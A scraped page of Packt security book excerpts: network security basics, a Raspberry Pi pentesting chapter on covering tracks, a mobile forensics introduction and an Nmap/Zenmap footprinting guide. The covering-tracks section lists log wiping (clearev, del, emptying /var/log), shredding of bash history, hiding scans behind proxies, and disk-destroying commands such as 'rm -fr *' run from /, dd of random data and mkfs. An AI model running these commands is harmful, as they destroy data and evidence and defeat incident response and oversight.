password management policies. Least privilege user access (LUA) is a core security strategy component, and all accounts should run with as few privileges and access levels as possible. Conduct regular security design and code reviews including penetration tests and vulnerability scans to identify and mitigate vulnerabilities. Require e-mail authentication on all inbound and outbound mail servers to help detect malicious e-mail including spear phishing and spoofed e-mail. Continuously monitor in real-time the security of your organization's infrastructure including collecting and analyzing all network traffic, and analyzing centralized logs (including firewall, IDS/IPS, VPN, and AV) using log management tools, as well as reviewing network statistics. Identify anomalous activity, investigate, and revise your view of anomalous activity accordingly. User training would be the biggest challenge, but is arguably the most important defense. Security for individual versus company One of the fundamental questions individuals need to ask themselves, is there a difference between them the individual and an organization? Individual security is less likely due to attack service area. However, there are tools and sites on the internet that can be utilized to detect and mitigate data breaches for both.https://haveibeenpwned.com/ or http://map.norsecorp.com/ are good sites to start with. The issue is that individuals believe they are not a target because there is little to gain from attacking individuals, but in truth everyone has the ability to become a target. Wi-Fi vulnerabilities Protecting wireless networks can be very challenging at times. There are many vulnerabilities that a hacker can exploit to compromise a wireless network. One of the basic Wi-Fi vulnerabilities is broadcasting the Service Set Identifier (SSID) of your wireless network. Broadcasting the SSID makes the wireless network easier to find and target. Another vulnerability in Wi-Fi networks is using Media Access Control (MAC) addressesfor network authentication. A hacker can easily spoof or mimic a trusted MAC address to gain access to the network. Using weak encryption such as Wired Equivalent Privacy (WEP) will make your network an easy target for attack. There are many hacking tools available to crack any WEP key in under five minutes. A major physical vulnerability in wireless networks are the Access Points (AP). Sometimes APs will be placed in poor locations that can be easily accessed by a hacker. A hacker may install what is called a rogue AP. This rogue AP will monitor the network for data that a hacker can use to escalate their attack. Often this tactic is used to harvest the credentials of high ranking management personnel, to gain access to encrypted databases that contain the personal/financial data of employees and customers or both. Peer-to-peer technology can also be a vulnerability for wireless networks. A hacker may gain access to a wireless network by using a legitimate user as an accepted entry point. Not using and enforcing security policies is also a major vulnerability found in wireless networks. Using security tools like Active Directory (deployed properly) will make it harder for a hacker to gain access to a network. Hackers will often go after low hanging fruit (easy targets), so having at least some deterrence will go a long way in protecting your wireless network. Using Intrusion Detection Systems (IDS) in combination with Active Directory will immensely increase the defense of any wireless network. Although the most effective factor is, having a well-trained and informed cyber security professional watching over the network. The more a cyber security professional (threat hunter) understands the tactics of a hacker, the more effective that Threat hunter will become in discovering and neutralizing a network attack. Although there are many challenges in protecting a wireless network, with the proper planning and deployment those challenges can be overcome. Knowns and unknowns The toughest thing about an unknown risk to security is that they are unknown. Unless they are found they can stay hidden. A common practice to determine an unknown risk would be to identify all the known risks and attempt to mitigate them as best as possible. There are many sites available that can assist in this venture. The most helpful would be reports from CVE sites that identify vulnerabilities. False positives   Positive Negative True TP: correctly identified TN: correctly rejected False FP: incorrectly identified FN: incorrectly rejected As it related to detection for an analyzed event there are four situations that exist in this context, corresponding to the relation between the result of the detection for an analyzed event. In this case, each of the corresponding situations mentioned in the preceding table are outlined as follows: True positive (TP): It is when the analyzed event is correctly classified as intrusion or as harmful/malicious. For example, a network security administrator enters their credentials into the Active Directory server and is granted administrator access. True negative (TN): It is when the analyzed event is correctly classified and correctly rejected. For example, an attacker uses a port like 4444 to communicate with a victim's device. An intrusion detection system detects network traffic on the authorized port and alerts the cyber security team to this potential malicious activity. The cyber security team quickly closes the port and isolates the infected device from the network. False positive (FP): It is when the analyzed event is innocuous or otherwise clean as it relates to perspective of security, however, the system classifies it as malicious or harmful. For example, a user types their password into a website's login text field. Instead of being granted access, the user is flagged for an SQL injection attempt by input sanitation. This is often caused when input sanitation is misconfigured. False negative (FN): It is when the analyzed event is malicious but it is classified as normal/innocuous. For example, an attacker inputs an SQL injection string into a text field found on a website to gain unauthorized access to database information. The website accepts the SQL injection as normal user behavior and grants access to the attacker. As it relates to detection, having systems correctly identify the given situations in paramount. Mitigation against threats There are many threats that a network faces. New network threats are emerging all the time. As a network security, professional, it would be wise to have a good understanding of effective mitigation techniques. For example, a hacker using a packet sniffer can be mitigated by only allowing the network admin to run a network analyzer (packet sniffer) on the network. A packet sniffer can usually detect another packet sniffer on the network right away. Although, there are ways a knowledgeable hacker can disguise the packet sniffer as another piece of software. A hacker will not usually go to such lengths unless it is a highly-secured target. It is alarming that; most businesses do not properly monitor their network or even at all. It is important for any business to have a business continuity/disaster recovery plan. This plan is intended to allow a business to continue to operate and recover from a serious network attack. The most common deployment of the continuity/disaster recovery plan is after a DDoS attack. A DDoS attack could potentially cost a business or organization millions of dollars is lost revenue and productivity. One of the most effective and hardest to mitigate attacks is social engineering. All the most devastating network attacks have begun with some type of social engineering attack. One good example is the hack against Snapchat on February 26th, 2016. "Last Friday, Snapchat's payroll department was targeted by an isolated e-mail phishing scam in which a scammer impersonated our Chief Executive Officer and asked for employee payroll information," Snapchat explained in a blog post. Unfortunately, the phishing e-mail wasn't recognized for what it was — a scam — and payroll information about some current and former employees was disclosed externally. Socially engineered phishing e-mails, same as the one that affected Snapchat are common attack vectors for hackers. The one difference between phishing e-mails from a few years ago, and the ones in 2016 is, the level of social engineering hackers are putting into the e-mails. The Snapchat HR phishing e-mail, indicated a high level of reconnaissance on the Chief Executive Officer of Snapchat. This reconnaissance most likely took months. This level of detail and targeting of an individual (Chief Executive Officer) is more accurately know as a spear-phishing e-mail. Spear-phishing campaigns go after one individual (fish) compared to phishing campaigns that are more general and may be sent to millions of users (fish). It is like casting a big open net into the water and seeing what comes back. The only real way to mitigate against social engineering attacks is training and building awareness among users. By properly training the users that access the network, it will create a higher level of awareness against socially engineered attacks. Building an assessment Creating a network assessment is an important aspect of network security. A network assessment will allow for a better understanding of where vulnerabilities may be found within the network. It is important to know precisely what you are doing during a network assessment. If the assessment is done wrong, you could cause great harm to the network you are trying to protect. Before you start the network assessment, you should determine the objectives of the assessment itself. Are you trying to identify if the network has any open ports that shouldn't be? Is your objective to quantify how much traffic flows through the network at any given time or a specific time? Once you decide on the objectives of the network assessment, you will then be able to choose the type of tools you will use. Network assessment tools are often known as penetration testing tools. A person who employs these tools is known as a penetration tester or pen tester. These tools are designed to find and exploit network vulnerabilities, so that they can be fixed before a real attack occurs. That is why it is important to know what you are doing when using penetration testing tools during an assessment. Sometimes network assessments require a team. It is important to have an accurate idea of the scale of the network before you pick your team. In a large enterprise network, it can be easy to become overwhelmed by tasks to complete without enough support. Once the scale of the network assessment is complete, the next step would be to ensure you have written permission and scope from management. All parties involved in the network assessment must be clear on what can and cannot be done to the network during the assessment. After the assessment is completed, the last step is creating a report to educate concerned parties of the findings. Providing detailed information and solutions to vulnerabilities will help keep the network up to date on defense. The report will also be able to determine if there are any viruses lying dormant, waiting for the opportune time to attack the network. Network assessments should be conducted routinely and frequently to help ensure strong networksecurity. Summary In this article we covered the fundamentals of network security. It began by explaining the importance of having network security and what should be done to secure the network. It also covered the different ways physical security can be applied. The importance of having security policies in place and wireless security was discussed. This article also spoke about wireless security policies and why they are important. Resources for Article: Further resources on this subject: API and Intent-Driven Networking [article] Deploying First Server [article] Point-to-Point Networks [article]
Read more
  • 0
  • 0
  • 3292

article-image-finishing-attack-report-and-withdraw
Packt
21 Dec 2016
11 min read
Save for later

Finishing the Attack: Report and Withdraw

Packt
21 Dec 2016
11 min read
In this article by Michael McPhee and Jason Beltrame, the author of the book Penetration Testing with Raspberry Pi - Second Edition we will look at the final stage of the Penetration Testing Kill Chain, which is Reporting and Withdrawing. Some may argue the validity and importance of this step, since much of the hard-hitting effort and impact. But, without properly cleaning up and covering our tracks, we can leave little breadcrumbs with can notify others to where we have been and also what we have done. This article covers the following topics: Covering our tracks Masking our network footprint (For more resources related to this topic, see here.) Covering our tracks One of the key tasks in which penetration testers as well as criminals tend to fail is cleaning up after they breach a system. Forensic evidence can be anything from the digital network footprint (the IP address, type of network traffic seen on the wire, and so on) to the logs on a compromised endpoint. There is also evidence on the used tools, such as those used when using a Raspberry Pi to do something malicious. An example is running more ~/.bash_history on a Raspberry Pi to see the entire history of the commands that were used. The good news for Raspberry Pi hackers is that they don't have to worry about storage elements such as ROM since the only storage to consider is the microSD card. This means attackers just need to re-flash the microSD card to erase evidence that the Raspberry Pi was used. Before doing that, let's work our way through the clean up process starting from the compromised system to the last step of reimaging our Raspberry Pi. Wiping logs The first step we should perform to cover our tracks is clean any event logs from the compromised system that we accessed. For Windows systems, we can use a tool within Metasploit called Clearev that does this for us in an automated fashion. Clearev is designed to access a Windows system and wipe the logs. An overzealous administrator might notice the changes when we clean the logs. However, most administrators will never notice the changes. Also, since the logs are wiped, the worst that could happen is that an administrator might identify that their systems have been breached, but the logs containing our access information would have been removed. Clearev comes with the Metasploit arsenal. To use clearev once we have breached a Windows system with a Meterpreter, type meterpreter > clearev. There is no further configuration, which means clearev just wipes the logs upon execution. The following screenshot shows what that will look like: Here is an example of the logs before they are wiped on a Windows system: Another way to wipe off logs from a compromised Windows system is by installing a Windows log cleaning program. There are many options available to download, such as ClearLogs found at http://ntsecurity.nu/toolbox/clearlogs/. Programs such as these are simple to use, we can just install and run it on a target once we are finished with our penetration test. We can also just delete the logs manually using the C: del %WINDR%* .log /a/s/q/f command. This command directs all logs using /a including subfolders /s, disables any queries so we don't get prompted, and /f forces this action. Whichever program you use, make sure to delete the executable file once the log files are removed so that the file isn't identified during a future forensic investigation. For Linux systems, we need to get access to the /var/log folder to find the log files. Once we have access to the log files, we can simply open them and remove all entries. The following screenshot shows an example of our Raspberry Pi's log folder: We can just delete the files using the remove command, rm, such as rm FILE.txt or delete the entire folder; however, this wouldn't be as stealthy as wiping existing files clean of your footprint. Another option is in Bash. We can simply type > /path/to/file to empty the contents of a file, without removing it necessarily. This approach has some stealth benefits. Kali Linux does not have a GUI-based text editor, so one easy-to-use tool that we can install is gedit. We'll use apt-get install gedit to download it. Once installed, we can find gedit under the application dropdown or just type gedit in the terminal window. As we can see from the following screenshot, it looks like many common text file editors. Let's click on File and select files from the /var/log folder to modify them. We also need to erase the command history since the Bash shell saves the last 500 commands. This forensic evidence can be accessed by typing the more ~/.bash_history command. The following screenshot shows the first of the hundreds of commands we recently ran on my Raspberry Pi: To verify the number of stored commands in the history file, we can type the echo $HISTSIZE command. To erase this history, let's type export HISTSIZE=0. From this point, the shell will not store any command history, that is, if we press the up arrow key, it will not show the last command. These commands can also be placed in a .bashrc file on Linux hosts. The following screenshot shows that we have verified if our last 500 commands are stored. It also shows what happens after we erase them: It is a best practice to set this command prior to using any commands on a compromised system, so that nothing is stored upfront. You could log out and log back in once the export HISTSIZE=0 command is set to clear your history as well. You should also do this on your C&C server once you conclude your penetration test if you have any concerns of being investigated. A more aggressive and quicker way to remove our history file on a Linux system is to shred it with the shred –zu /root/.bash_history command. This command overwrites the history file with zeros and then deletes the log files. We can verify this using the less /root/.bash_history command to see if there is anything left in your history file, as shown in the following screenshot: Masking our network footprint Anonymity is a key ingredient when performing our attacks, unless we don't mind someone being able to trace us back to our location and giving up our position. Because of this, we need a way to hide or mask where we are coming from. This approach is perfect for a proxy or groups of proxies if we really want to make sure we don't leave a trail of breadcrumbs. When using a proxy, the source of an attack will look as though it is coming from the proxy instead of the real source. Layering multiple proxies can help provide an onion effect, in which each layer hides the other, and makes it very difficult to determine the real source during any forensic investigation. Proxies come in various types and flavors. There are websites devoted for hiding our source online, and with a quick Google search, we can see some of the most popular like hide.me, Hidestar, NewIPNow, ProxySite and even AnonyMouse. Following is a screenshot from NewIPNow website. Administrators of proxies can see all traffic as well as identify both the target and the victims that communicate through their proxy. It is highly recommended that you research any proxy prior to using it as some might use information captured without your permission. This includes providing forensic evidence to authorities or selling your sensitive information. Using ProxyChains Now, if web based proxies are not what we are looking for, we can use our Raspberry Pi as a proxy server utilizing the ProxyChains application. ProxyChains is very easy application to setup and start using. First, we need to install the application. This can be accomplished this by running the following command from the CLI: root@kali:~# apt-get install proxychains Once installed, we just need to edit the ProxyChains configuration located at /etc/proxychains.conf, and put in the proxy servers we would like to use: There are lots of options out there for finding public proxies. We should certainly use with some caution, as some proxies will use our data without our permission, so we'll be sure to do our research prior to using one. Once we have one picked out and have updated our proxychains.conf file, we can test it out. To use ProxyChains, we just need to follow the following syntax: proxychains <command you want tunneled and proxied> <opt args> Based on that syntax, to run a nmap scan, we would use the following command: root@kali:~# proxychains nmap 192.168.245.0/24 ProxyChains-3.1 (http://proxychains.sf.net) Starting Nmap 7.25BETA1 ( https://nmap.org ) Clearing the data off the Raspberry Pi Now that we have covered our tracks on the network side, as well as on the endpoint, all we have left is any of the equipment that we have left behind. This includes our Raspberry Pi. To reset our Raspberry Pi back to factory defaults, we can refer back to installing Kali Linux. For re-installing Kali or the NOOBS software. This will allow us to have clean image running once again. If we had cloned your golden image we could just re-image our Raspberry Pi with that image. If we don't have the option to re-image or reinstall your Raspberry Pi, we do have the option to just destroy the hardware. The most important piece to destroy would be the microSD card (see image following), as it contains everything that we have done on the Pi. But, we may want to consider destroying any of the interfaces that you may have used (USB WiFi, Ethernet or Bluetooth adapters), as any of those physical MAC addresses may have been recorded on the target network, and therefore could prove that device was there. If we had used our onboard interfaces, we may even need to destroy the Raspberry Pi itself. If the Raspberry Pi is in a location that we cannot get to reclaim it or to destroy it, our only option is to remotely corrupt it so that we can remove any clues of our attack on the target. To do this, we can use the rm command within Kali. The rm command is used to remove files and such from the operating systems. As a cool bonus, rm has some interesting flags that we can use to our advantage. These flags include the –r and the –f flag. The –r flag indicates to perform the operation recursively, so everything in that directory and preceding will be removed while the –f flag is to force the deletion without asking. So running the command rm –fr * from any directory will remove all contents within that directory and anything preceding that. Where this command gets interesting is if we run it from / a.k.a. the top of the directory structure. Since the command will remove everything in that directory and preceding, running it from the top level will remove all files and hence render that box unusable. As any data forensics person will tell us, that data is still there, just not being used by the operation system. So, we really need to overwrite that data. We can do this by using the dd command. We used dd back when we were setting up the Raspberry Pi. We could simply use the following to get the job done: dd if=/dev/urandom of=/dev/sda1 (where sda1 is your microSD card) In this command we are basically writing random characters to the microSD card. Alternatively, we could always just reformat the whole microSD card using the mkfs.ext4 command: mkfs.ext4 /dev/sda1 ( where sda1 is your microSD card ) That is all helpful, but what happens if we don't want to destroy the device until we absolutely need to – as if we want the ability to send over a remote destroy signal? Kali Linux now includes a LUKS Nuke patch with its install. LUKS allows for a unified key to get into the container, and when combined with Logical Volume Manager (LVM), can created an encrypted container that needs a password in order to start the boot process. With the Nuke option, if we specify the Nuke password on boot up instead of the normal passphrase, all the keys on the system are deleted and therefore rendering the data inaccessible. Here are some great links to how and do this, as well as some more details on how it works: https://www.kali.org/tutorials/nuke-kali-linux-luks/ http://www.zdnet.com/article/developers-mull-adding-data-nuke-to-kali-linux/ Summary In this article we sawreports themselves are what our customer sees as our product. It should come as no surprise that we should then take great care to ensure they are well organized, informative, accurate and most importantly, meet the customer's objectives. Resources for Article: Further resources on this subject: Penetration Testing [article] Wireless and Mobile Hacks [article] Building Your Application [article]
Read more
  • 0
  • 0
  • 4821
article-image-digital-and-mobile-forensics
Packt
14 Nov 2016
14 min read
Save for later

Digital and Mobile Forensics

Packt
14 Nov 2016
14 min read
In this article, Mattia Epifani and Pasquale Stirparo, co-authors of the book Learning iOS Forensics - Second Edition, would be talking mainly, if not solely, about computer forensics and computer crimes, such as when an attacker breaks into a computer network system and steals data. This would involve two types of offenses—unlawful/unauthorized access and data theft. As mobile phones became more popular, the new field of mobile forensics developed. (For more resources related to this topic, see here.) Nowadays, things have changed radically and they are still changing at quite a fast pace as technology evolves. Digital forensics, which includes all disciplines dealing with electronic evidence, is also being applied to common crimes, to those that, at least by definition, are not strictly IT crimes. Today, more than ever, we live in a society that is fully digitalized and people are equipped with all kinds of devices, which have different types of capabilities, but all of them process, store, and transmit information (mainly over the Internet). This means that forensic investigators have to be able to deal with all these devices. As defined at the first Digital Forensics Research Workshop (DFRWS) in 2001, digital forensics is: "The use of scientifically derived and proven methods toward the preservation, collection, validation, identification, analysis, interpretation, documentation, and presentation of digital evidence derived from digital sources for the purpose of facilitating or furthering the reconstruction of events found to be criminal, or helping to anticipate unauthorized actions shown to be disruptive to planned operations." As Casey asserted (Casey, 2011): "In this modern age, it is hard to imagine a crime that does not have a digital dimension." Criminals of all kinds use technology to facilitate their offenses, communicate with their peers, recruit other criminals, launder money, commit credit card fraud, gather information on their victims, and so on. This obviously creates new challenges for all the different actors involved, such as attorneys, judges, law enforcement agents, and forensic examiners. Among the cases solved in recent years, there were kidnappings where the kidnapper was caught—thanks to a request for ransom sent by e-mail from his mobile phone. There have been many cases of industrial espionage in which unfaithful employees were hiding projects in the memory cards of their smartphones, cases of drug dealing solved—thanks to the evidence found in the backup of mobile phones that was on computer, and many other such cases. Even the largest robberies of our time are now being conducted via computer networks. In this article, you will learn the following: Definition and principles of mobile forensics How to properly handle digital evidence Mobile forensics Mobile forensics is a field of study in digital forensics that focuses on mobile devices. Among the different digital forensics fields, mobile forensics is without doubt the fastest growing and evolving area of study, having an impact on many different situations from corporate to criminal investigations and intelligence gathering, which are on the rise. Moreover, the importance of mobile forensics is increasing exponentially due to the continuous fast growth of the mobile market. One of the most interesting peculiarities of mobile forensics is that mobile devices, particularly mobile phones, usually belong to a single individual, while this is not always the case with a computer that may be shared among employees of a company or members of a family. For this reason, the analysis of mobile phones gives access to plenty of personal information. Another important and interesting aspect that comes with mobile forensics, which is both challenging and frustrating at the same time for the analyst, is the multitude of different device models and the customized flavors of their operating systems available in the market. This makes it very difficult to have a single solution (either a tool or process) to address them all. Just think of all the applications people have installed on their smartphones: IM clients, web browsers, social network clients, password managers, navigation systems, and much more, other than the classic default ones, such as an address book, which can provide a lot more information than just the phone number for each contact that has been saved. Moreover, syncing such devices with a computer has become a very easy and smooth process, and all user activities, schedules, to-do lists, and everything else is stored inside a smartphone. Aren't these enough to profile a person and reconstruct all their recent activities, than building the network of contacts? Finally, in addition to a variety of smartphones and operating systems, such as Apple iOS, Google Android, Microsoft Windows Phone, and Blackberry OS, there is a massive number of so-called feature phones that use older mobile OS systems. Therefore, it's pretty clear that when talking about mobile/smartphone forensics, there is so much more than just printouts of phone calls. In fact, with a complete examination, we can retrieve SMSes/MMSes, pictures, videos, installed applications, e-mails, geolocation data, and so on—both present and deleted information. Digital evidence As mentioned earlier, on one hand the increasing involvement of mobile devices in digital forensics cases has brought a whole new series of challenges and complexities. However, on the other hand, this has also resulted in a much greater amount of evidence from criminals that it is now being used to reconstruct their activities with a more comprehensive level of detail. Moreover, while classical physical evidence may be destroyed, digital evidence, most of the time, leaves traces. Over the years, there have been several definitions of what digital evidence actually is, some of them focusing particularly on the evidentiary aspects of proof to be used in court, such as the one proposed by the Standard Working Group on Digital Evidence (SWGDE), stating that: "Digital evidence is any information of probative value that is either stored or transmitted in a digital form." The definition proposed by the International Organization of Computer Evidence (IOCE) states: "Digital evidence is information stored or transmitted in binary form that may be relied on in court." The definition given by E. Casey (Casey, 2000), refers to digital evidence as: "Physical objects that can establish that a crime has been committed, can provide a link between a crime and its victim, or can provide a link between a crime and its perpetrator." While all of these are correct, as previously said, all of these definitions focus mostly on proofs and tend to disregard data that is extremely useful for an investigation. For this reason, and for the purpose of this book, we will refer to the definition given by Carrier (Carrier, 2006), where digital evidence is defined as: "Digital data that supports or refutes a hypothesis about digital events or the state of digital data." This definition is a more general one, but better matches the current state of digital evidence and its value within the entire investigation process. Also from a standardization point of view, there have been, and still are, many attempts to define guidelines and best practices for digital forensics on how to handle digital evidence. Other than the several guidelines and special publications from NIST, there is a standard from ISO/IEC that was released in 2012, the ISO 27037 guidelines for identification, collection and/or acquisition, and preservation of digital evidence, which is not specific to mobile forensics, but is related to digital forensics in general, aiming to build a standard procedure for collecting and handling digital evidence, which will be legally recognized and accepted in court in different countries. This is a really important goal if you consider the lack of borders in the Internet era, particularly when it comes to digital crimes, where illicit actions can be perpetrated by attackers from anywhere in the world. Handling of mobile evidence In order to be useful not only in court but also during the entire investigation phase, digital evidence must be collected, preserved, and analyzed in a forensically sound manner. This means that each step, from the identification to the reporting, has to be carefully and strictly followed. Historically, we are used to referring to a methodology as forensically sound if, and only if, it would imply that the original source of evidence remains unmodified and unaltered. This was mostly true when talking about classical computer forensics, in scenarios where the forensic practitioner found the computer switched off or had to deal with external hard drives, although not completely true even in these situations. However, since the rise of live forensics, this concept has become more and more untrue. In fact, methods and tools for acquiring memory from live systems inevitably alter, even if just a little bit, the target system they are run on. The advent of mobile forensics stresses this concept even more, because mobile devices, and smartphones in particular, are networked devices that continuously exchange data through several communication protocols, such as GSM/CDMA, Wi-Fi, Bluetooth, and so on. Moreover, in order to acquire a mobile device, forensic practitioners need to have some degree of interaction with the device. Based on the type, a smartphone can need more or less interaction, altering in this way the original state of the device. All of this does not mean that preservation of the source evidence is useless, but that it is nearly impossible in the field of mobile devices. Therefore, it becomes a matter of extreme importance to thoroughly document every step taken during the collection, preservation, and acquisition phases. Using this approach, forensic practitioners will be able to demonstrate that they have been as unintrusive as possible. As Casey states (Casey, 2011): "One of the keys to forensic soundness is documentation. A solid case is built on supporting documentation that reports on where the evidence originated and how it was handled. From a forensic standpoint, the acquisition process should change the original evidence as little as possible and any changes should be documented and assessed in the context of the final analytical results." When in the presence of mobile devices to be collected, it is a good practice for the forensic practitioner to consider the following points: Take note of the current location where the device has been found. Report the device status (switched on or off, broken screen, and so on). Report date, time, and other information visible on the screen if the device is switched on, for example, by taking a picture of the screen. Look very carefully for the presence of memory cards. Although it is not the case with iOS devices, generally many mobile phones have a slot for an external memory card, where pictures, chat databases, and many other types of user data are usually stored. Look very carefully for the presence of cables related to the mobile phone that is being collected, especially if you don't have a full set of cables in your lab. Many mobile phones have their own cables to connect to the computer and to recharge the battery. Search for the original Subscriber Identity Module (SIM) package, because that is where the PIN and PIN unblocking key (PUK) codes are written. Take pictures of every item before collection. Modifications to mobile devices can happen not only because of interaction with the forensic practitioner, but also due to interaction with the network, voluntarily or not. In fact, digital evidence in mobile devices can be lost completely as they are susceptible to being overwritten by new data, for example, with the smartphone receiving an SMS while it is being collected, thus overwriting possible evidence previously stored in the same area of memory as the newly arrived SMS, or upon receiving a remote wiping command over a wireless network. Most of today's smartphones and iOS devices can be configured to be completely wiped remotely. From a real case: While searching inside the house of a person under investigation, law enforcement agents found and seized, among other things, computers and a smartphone. After cataloguing and documenting everything, they put all the material into boxes to bring them back to the laboratory. Once back in their laboratory, when acquiring the smart phone in order to proceed with the forensics analysis, they noticed that the smartphone was empty and it appeared to be brand new. The owner had wiped it remotely. Therefore, isolating the mobile device from all radio networks is a fundamental step in the process of preservation of evidence. There are several ways to achieve this, all with their own pros and cons, as follows: Airplane mode: Enabling Airplane mode on a device requires some sort of interaction, which may pose some risks of modification by the forensic practitioner. This is one of the best possible options since it implies that all wireless communication chips are switched off. In this case, it is always good to document the action taken with pictures and/or videos. Normally, this is possible only if the phone is not password-protected or the password is known. However, for devices with iOS 7 or higher, it is also possible to enable airplane mode by lifting the dock from the bottom, where there will be a button with the shape of a plane. This is possible only if the Access on Lock Screen option is enabled from Settings | Control Center. Faraday's bag: This item is a sort of envelope made of conducting material, which blocks out static electric fields and electromagnetic radiation completely isolating the device from communicating with external networks. It is based, as the name suggests, on Faraday's law. This is the most common solution, particularly useful when the device is being carried from the crime scene to the lab after seizure. However, the use of Faraday's bag will make the phone continuously search for a network, which will cause the battery to quickly drain. Unfortunately, it is also risky to plug the phone to a power cable outside that will go inside the bag, because this may act as antenna. Moreover, it is important to keep in mind that when you remove the phone from the bag (once arrived in the lab) it will again be exposed to the network. So, you would need either a shielded lab environment or a Faraday solution that would allow you to access the phone while it is still inside the shielded container, without the need for external power cables. Jamming: A jammer is used to prevent a wireless device from communicating by sending out radio waves along the same frequencies as that device. In our case, it would jam the GSM/UMTS/LTE frequencies that mobile phones use to connect with cellular base stations to send/receive data. Be aware that this practice may be considered illegal in some countries, since it will also interfere with any other mobile device in the range of the jammer, disrupting their communications too. Switching off the device: This is a very risky practice because it may activate authentication mechanisms, such as PIN codes or passcodes, that are not available to the forensic practitioner, or other encryption mechanisms that carry the risk of delaying or even blocking the acquisition of the mobile device. Removing the SIM card: In most mobile devices, this operation implies removing the battery and therefore all the risks and consequences we just mentioned regarding switching off the device; however, in iOS devices this task is quite straightforward and easy, and it does not imply removing the battery (in iOS devices this is not possible). Moreover, SIM cards can have PIN protection enabled; removing it from the phone may lock the SIM card, preventing its content from being displayed. However, bear in mind that removing the SIM card will isolate the device only from the cellular network, while other networks, such as Wi-Fi or Bluetooth, may still be active and therefore need to be addressed. The following image shows a SIM card extracted from an iPhone with just a clip; image taken from http://www.maclife.com/: Summary In this article, we gave a general introduction to digital forensics for those relatively new to this area of study and a good recap to those already in the field, keeping the mobile forensics field specifically in mind. We have shown what digital evidence is and how it should be handled, presenting several techniques to isolate the mobile device from the network. Resources for Article: Further resources on this subject: Mobile Forensics [article] Mobile Forensics and Its Challanges [article] Forensics Recovery [article]
Read more
  • 0
  • 0
  • 5603

article-image-information-gathering-and-vulnerability-assessment-0
Packt
08 Nov 2016
7 min read
Save for later

Information Gathering and Vulnerability Assessment

Packt
08 Nov 2016
7 min read
In this article by Wolf Halton and Bo Weaver, the authors of the book Kali Linux 2: Windows Penetration Testing, we try to debunk the myth that all Windows systems are easy to exploit. This is not entirely true. Almost any Windows system can be hardened to the point that it takes too long to exploit its vulnerabilities. In this article, you will learn the following: How to footprint your Windows network and discover the vulnerabilities before the bad guys do Ways to investigate and map your Windows network to find the Windows systems that are susceptible to exploits (For more resources related to this topic, see here.) In some cases, this will be adding to your knowledge of the top 10 security tools, and in others, we will show you entirely new tools to handle this category of investigation. Footprinting the network You can't find your way without a good map. In this article, we are going to learn how to gather network information and assess the vulnerabilities on the network. In the Hacker world this is called Footprinting. This is the first step to any righteous hack. This is where you will save yourself time and massive headaches. Without Footprinting your targets, you are just shooting in the dark. The biggest tool in any good pen tester's toolbox is Mindset. You have to have the mind of a sniper. You learn your targets habits and its actions. You learn the traffic flows on the network where your target lives. You find the weaknesses in your target and then attack those weaknesses. Search and destroy! In order to do good Footprinting, you have to use several tools that come with Kali. Each tool has it strong points and looks at the target from a different angle. The more views you have of your target, the better plan of attack you have. Footprinting will differ depending on whether your targets are external on the public network, or internal and on a LAN. We will be covering both aspects. Please read the paragraph above again, and remember you do not have our permission to attack these machines. Don't do the crime if you can't do the time. Exploring the network with Nmap You can't talk about networking without talking about Nmap. Nmap is the Swiss Army knife for network administrators. It is not only a great Footprinting tool, but also the best and cheapest network analysis tool any sysadmin can get. It's a great tool for checking a single server to make sure the ports are operating properly. It can heartbeat and ping an entire network segment. It can even discover machines when ICMP (ping) has been turned off. It can be used to pressure-test services. If the machine freezes under the load, it needs repairs. Nmap was created in 1997 by Gordon Lyon, who goes by the handle Fyodor on the Internet. Fyodor still maintains Nmap and it can be downloaded from http://insecure.org. You can also order his book Nmap Network Scanning on that website. It is a great book, well worth the price! Fyodor and the Nmap hackers have collected a great deal of information and security e-mail lists on their site. Since you have Kali Linux, you have a full copy of Nmap already installed! Here is an example of Nmap running against a Kali Linux instance. Open the terminal from the icon on the top bar or by clicking on the menu link Application | Accessories | Terminal. You could also choose the Root Terminal if you want, but since you are already logged in as Root, you will not see any differences in how the terminal emulator behaves. Type nmap -A 10.0.0.4 at the command prompt (you need to put in the IP of the machine you are testing). The output shows the open ports among 1000 commonly used ports. Kali Linux, by default, has no running network services, and so in this run you will see a readout showing no open ports. To make it a little more interesting, start the built-in webserver by typing /etc/init.d/apache2 start. With the web server started, run the Nmap command again: nmap -A 10.0.0.4 As you can see, Nmap is attempting to discover the operating system (OS) and to tell which version of the web server is running: Here is an example of running Nmap from the Git Bash application, which lets you run Linux commands on your Windows desktop. This view shows a neat feature of Nmap. If you get bored or anxious and think the system is taking too much time to scan, you can hit the down arrow key and it will print out a status line to tell you what percentage of the scan is complete. This is not the same as telling you how much time is left on the scan, but it does give you an idea what has been done: Zenmap Nmap comes with a GUI frontend called Zenmap. Zenmap is a friendly graphic interface for the Nmap application. You will find Zenmap under Applications | Information Gathering | Zenmap. Like many Windows engineers, you may like Zenmap more than Nmap: Here we see a list of the most common scans in a drop-down box. One of the cool features of Zenmap is when you set up a scan using the buttons, the application also writes out the command-line version of the command, which will help you learn the command-line flags used when using Nmap in command-line mode. Hacker tip Most hackers are very comfortable with the Linux Command Line Interface (CLI). You want to learn the Nmap commands on the command line because you can use Nmap inside automated Bash scripts and make up cron jobs to make routine scans much simpler. You can set a cron job to run the test in non-peak hours, when the network is quieter, and your tests will have less impact on the network's legitimate users. The choice of intense scan produces a command line of nmap -T4 -A -v. This produces a fast scan. The T stands for Timing (from 1 to 5), and the default timing is -T3. The faster the timing, the rougher the test, and the more likely you are to be detected if the network is running an Intrusion Detection System (IDS). The -A stands for All, so this single option gets you a deep port scan, including OS identification, and attempts to find the applications listening on the ports, and the versions of those applications.  Finally, the -v stands for verbose. -vv means very verbose: Summary In this article, we learned about penetration testing in a Windows environment. Contrary to popular belief, Windows is not riddled with wide-open security holes ready for attackers to find. We learned how to use nmap to obtain detailed statistics about the network, making it an indispensible tool in our pen testing kit. Then, we looked at Zenmap, which is a GUI frontend for nmap and makes it easy for us to view the network. Think of nmap as flight control using audio transmissions and Zenmap as a big green radar screen—that's how much easier it makes our work. Resources for Article: Further resources on this subject: Bringing DevOps to Network Operations [article] Installing Magento [article] Zabbix Configuration [article]
Read more
  • 0
  • 0
  • 3488

article-image-approaching-penetration-test-using-metasploit
Packt
26 Sep 2016
17 min read
Save for later

Approaching a Penetration Test Using Metasploit

Packt
26 Sep 2016
17 min read
